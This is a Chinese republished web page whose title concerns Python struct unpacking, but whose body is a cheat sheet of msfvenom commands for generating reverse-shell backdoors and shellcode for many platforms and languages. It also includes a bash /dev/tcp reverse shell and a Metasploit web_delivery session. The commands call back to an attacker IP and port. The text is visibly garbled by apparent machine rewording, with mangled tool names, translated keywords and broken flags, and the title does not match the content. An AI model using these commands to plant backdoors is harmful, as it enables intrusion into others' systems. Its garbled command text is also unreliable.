首页 > 编程知识 正文

python struct unpack,python为什么叫爬虫

时间:2023-05-06 02:40:46 阅读:151187 作者:2863

生成各种后门

Windows:

MSF venom-ax86---platform windows-p windows/meter preter/reverse _ tcpl host=

攻击机IP LPORT=攻击机瘦魔镜/Shi kata _ ga _ nai-b 'x00x0axff '-i3-fexe-o

payload.exe

Linux:

MSF venom-ax86---platform Linux-p Linux/x86/meter preter/reverse _ tcpl host=攻击

打孔IP LPORT=攻击机端口-f elf -o payload.elf

MAC OS:

MSF venom-ax86---- platform OS x-posx/x86/shell _ reverse _ tcpl host=攻击机IP

LPORT=攻击机端口-f macho -o payload.macho

安卓:

MSF venom-ax86-- -平台安卓- p安卓/meter preter/reverse _ tcpl host=攻击

打孔IP LPORT=攻击机端口-f apk -o payload.apk

PowerShell:

MSF venom-ax86---platform windows-p windows/powershell _ reverse _ tcpl host=

攻击机IP LPORT=攻击机端口- ecmd/powershell _ base64-i3-fraw-opayload.PS1

PHP:

MSF venom-pphp/meter preter _ reverse _ tcpl host=lport=

-f raw shell.php

cat shell.php | pbcopy echo '? PHP '|tr-d 'n ' shell.phppbpaste

壳牌. PHP

ASP.net:

MSF venom-ax86---platform windows-p windows/meter preter/reverse _ tcpl host=

攻击机IP LPORT=攻击机端口-f aspx -o payload.aspx

JSP:

MSF venom-- platform Java-p Java/JSP _ shell _ reverse _ tcpl host=攻击机IP LPORT=攻击

打孔端口-f raw -o payload.jsp

War:

MSF venom-p Java/JSP _ shell _ reverse _ tcpl host=攻击机IP LPORT=攻击机端口-f raw -

o payload.war

Node.js:

MSF venom-pnode js/shell _ reverse _ tcpl host=攻击机IP LPORT=攻击机端口-f raw -o

payload.js

Python:

MSF venom-p python/meter preter/reverse _ tcpl host=攻击机IP LPORT=攻击机端口-

f raw -o payload.py

Perl:

MSF venom-pcmd/UNIX/reverse _ perl lhost=攻击机IP LPORT=攻击机端口-f raw -o

payload.pl

Ruby:

MSF venom-p ruby/shell _ reverse _ tcpl host=攻击机IP LPORT=攻击机端口-f raw -o

payload.rb

Lua:

MSF venom-pcmd/UNIX/reverse _ Lua lhost=攻击机IP LPORT=攻击机端口-f raw -o

payload.lua

生成###外壳代码

Windows ShellCode:

MSF venom-ax86---platform windows-p windows/meter preter/reverse _ tcpl host=

攻击机IP LPORT=攻击机端口-f c

linux shellcode:

MSF venom-ax86---platform Linux-p Linux/x86/meter preter/reverse _ tcpl host=攻击

攻击机IP LPORT=攻击机端口-f c

mac shellcode:

MSF venom-ax86---- platform OS x-posx/x86/shell _ reverse _ tcpl host=攻击机IP

LPORT=攻击机端口-f c

Bash shellcode:

[ root @ localhost~] # MSF venom-pcmd/UNIX/reverse _ bash lhost=192.168.1.30 lport=8888-fraw payload.sh

[ root @ localhost~] # exe C5/dev/TCP/xx.xx.xx.xx/xx

[root@localhost ~]# cat 5 5 done

Python shellcode

ms F5 use exploit/multi/script/web _ delivery

ms F5 exploit (multi/script/web _ delivery ) set srvhost 192.168.1.30

srvhost=192.168.1.30

ms F5 exploit (multi/script/web _ delivery ) set lhost 192.168.1.30

lhost=192.168.1.30

ms F5 exploit (multi/script/web _ delivery ) set uripath lyshark

uripath=lyshark

ms F5 exploit (multi/script/web _ delivery ) exploit -j -z

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。